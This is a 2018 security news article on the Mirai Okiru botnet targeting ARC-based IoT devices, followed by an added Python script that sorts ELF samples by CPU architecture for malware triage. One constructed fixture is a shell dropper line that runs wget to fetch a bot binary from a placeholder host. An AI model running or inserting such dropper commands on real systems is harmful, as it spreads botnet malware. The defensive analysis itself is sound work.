Meet Mirai Okiru and brace for the DDoS botnet targeting 'billions' of ARC-based IoT devices.

Well, this is bad…very bad. Mirai malware and its many variants have targeted a range of CPU architectures in the past; now a variant is targeting the second most popular type of CPU core, ARC processors.

Meet Mirai Okiru, the Mirai variant targeting ARC processors. ARC cores are embedded processors used in IoT, automotive, mobile, TVs, cameras and a nearly endless list of products; the CPUs reportedly ship in over a billion products per year. Brace yourself for the botnet targeting ARC-based IoT devices.

According to security researcher Odisseus:

"From this day, the landscape of #Linux #IoT infection will change. #ARC cpu has produced #IoT devices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It's a serious threat will be. #MalwareMustDie!" — Odisseus (@_odisseus) January 14, 2018

Odisseus noted that @unixfreaxjp, from the MalwareMustDie team, first spotted the Okiru sample. At the time of writing, the detection rate on VirusTotal was 13 of 58; it was only 5 of 60 when Odisseus tweeted:

"This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet. #MalwareMustDie pic.twitter.com/y8CRwwkenA" — Odisseus (@_odisseus) January 14, 2018

The detection rate for the Okiru downloader was only 1 of 59; it is a mere 4 of 59 at the time of writing.

The news was picked up by Pierluigi Paganini on Security Affairs; Italy's CERT-PA (Computer Emergency Response Team) noted that 20 minutes after Security Affairs published a piece about Mirai Okiru, the "domain was subject to a massive DDoS attack that inhibited access for about an hour."

You may remember hearing about the Mirai variant Satori (pdf) back in December; it was sometimes also called Okiru. Satori was used to attack "hundreds of thousands" of Huawei routers. The exploit was released for "free" on Christmas by what NewSky Security dubbed a blackhat Santa. Despite the similarities between the two types of Linux IoT DDoS malware, Mirai Okiru is "very different" from the Mirai Satori variant. The differences were pointed out on the subreddit LinuxMalware.

According to the translated version of CERT-PA's post:

"The MMD researchers, who have already released Yara rules to identify this new variant of Mirai, have compared Okiru with the previous Mirai botnet called Satori. According to the researchers' observations, the Okiru configuration is encrypted in two parts and the attack via Telnet is much more incisive, as it uses a list of over 100 credentials (114 are the credentials counted by MMD)."

Odisseus noted that it is important to understand the differences and to have different signatures to detect both:

"Very important to understand how #Mirai #Satori variant is DIFFERENT from #Okiru: quick notes with screenshots by @malwaremustdie. And why it is needed different sigs to DETECT BOTH and how each has different effects in #IoT infection. https://t.co/Wdh52u1wBL #MalwareMustDie pic.twitter.com/AEtxqmsqiF" — Odisseus (@_odisseus) January 14, 2018

We all know that the majority of IoT devices have super sucky security, if security was bolted on at all. None of us will forget what 100,000 Mirai-infected devices were capable of doing when they took down Dyn's DNS service in 2016. A piece written in 2014 claimed, "Synopsys' ARC processor IP cores have been licensed by more than 190 companies and are used in more than 1.5 billion products a year." Since that post is four years old, how many more products now have ARC cores? How many of those are "secure?"

If you think back on the havoc wreaked by 100,000 devices taken over by the Mirai botnet in 2016, what hell can be unleashed in 2018 if attackers gain control of millions of ARC-based IoT devices for the Mirai Okiru DDoS botnet?
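The first triage question with a "first malware for ARC" sample is whether the dropped binaries really are ARC ELF executables, and which of the per-architecture payloads a Mirai-family loader pushed. The following is an added example, not code from this article, from MalwareMustDie or from their Yara rules: it reads the e_machine field of the ELF header (values from the ELF specification and glibc elf.h: EM_ARC 0x2D, EM_ARC_COMPACT 0x5D, EM_ARC_COMPACT2 0xC3) and sorts a set of headers by target CPU. The sample headers, file names and the example.invalid URL are constructed for illustration; they are not real Okiru samples.

```python
import struct

# ELF e_machine values, from the ELF specification / glibc <elf.h>.
# The three ARC entries cover the Synopsys (formerly ARC International) cores.
ELF_MACHINES = {
    0x03: "x86",
    0x08: "MIPS",
    0x14: "PowerPC",
    0x28: "ARM",
    0x2A: "SuperH",
    0x2D: "ARC (EM_ARC)",
    0x3E: "x86-64",
    0x5D: "ARCompact (EM_ARC_COMPACT)",
    0xB7: "AArch64",
    0xC3: "ARCv2 (EM_ARC_COMPACT2)",
}
ARC_MACHINES = {0x2D, 0x5D, 0xC3}

ELF_TYPES = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def parse_elf_header(data: bytes) -> dict:
    """Parse the identification bytes and e_type/e_machine of an ELF image.

    Only the first 20 bytes are needed. Endianness is taken from EI_DATA, so a
    big-endian sample (common for MIPS builds) is decoded correctly instead of
    being assumed little-endian. Raises ValueError for non-ELF or truncated input.
    """
    if len(data) < 20:
        raise ValueError("truncated: need at least 20 bytes of ELF header")
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file (bad magic)")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("malformed EI_CLASS/EI_DATA")
    fmt = ("<" if ei_data == 1 else ">") + "HH"
    e_type, e_machine = struct.unpack(fmt, data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": ELF_TYPES.get(e_type, f"unknown({e_type})"),
        "machine": e_machine,
        "machine_name": ELF_MACHINES.get(e_machine, f"unknown(0x{e_machine:02x})"),
        "is_arc": e_machine in ARC_MACHINES,
    }


def triage_samples(samples: dict) -> dict:
    """Map sample name -> one-line architecture summary, or 'not ELF: <reason>'."""
    out = {}
    for name, blob in samples.items():
        try:
            h = parse_elf_header(blob)
            out[name] = f"{h['machine_name']} {h['bits']}-bit {h['endian']}-endian {h['type']}"
        except ValueError as exc:
            out[name] = f"not ELF: {exc}"
    return out


def make_elf_header(ei_class: int, ei_data: int, e_type: int, e_machine: int) -> bytes:
    """Build a minimal 52-byte ELF32-shaped header for the constructed samples below."""
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + bytes(8)  # EI_VERSION=1, padding
    fmt = ("<" if ei_data == 1 else ">") + "HHI"
    body = struct.pack(fmt, e_type, e_machine, 1)  # e_type, e_machine, e_version
    return (ident + body).ljust(52, b"\x00")


# Constructed sample headers (not real Mirai samples): the kind of per-architecture
# drop set a Mirai-family loader pushes, plus a shell dropper and a truncated file.
SAMPLES = {
    "okiru.arc": make_elf_header(1, 1, 2, 0xC3),     # 32-bit LE EXEC for ARCv2
    "okiru.arc700": make_elf_header(1, 1, 2, 0x5D),  # ARCompact
    "bot.mips": make_elf_header(1, 2, 2, 0x08),      # big-endian MIPS
    "bot.arm7": make_elf_header(1, 1, 2, 0x28),      # ARM
    "bot.x86": make_elf_header(1, 1, 2, 0x03),
    "dropper.sh": b"#!/bin/sh\nwget http://example.invalid/bot.mips\n",  # constructed
    "partial.bin": b"\x7fELF\x01\x01",
}


def arc_samples(samples: dict = SAMPLES) -> list:
    """Names of samples whose ELF header declares an ARC target, sorted."""
    names = []
    for name, blob in samples.items():
        try:
            if parse_elf_header(blob)["is_arc"]:
                names.append(name)
        except ValueError:
            pass
    return sorted(names)


if __name__ == "__main__":
    for name, summary in triage_samples(SAMPLES).items():
        print(f"{name:14} {summary}")
    print("ARC targets:", arc_samples())
```

The e_machine field is just a header value and can be forged, but cross-compiled Mirai builds carry the correct one, so this check quickly separates an ARC payload from the MIPS, ARM and x86 builds dropped alongside it; for actual identification of Okiru versus Satori, pair it with the MMD Yara rules the article mentions.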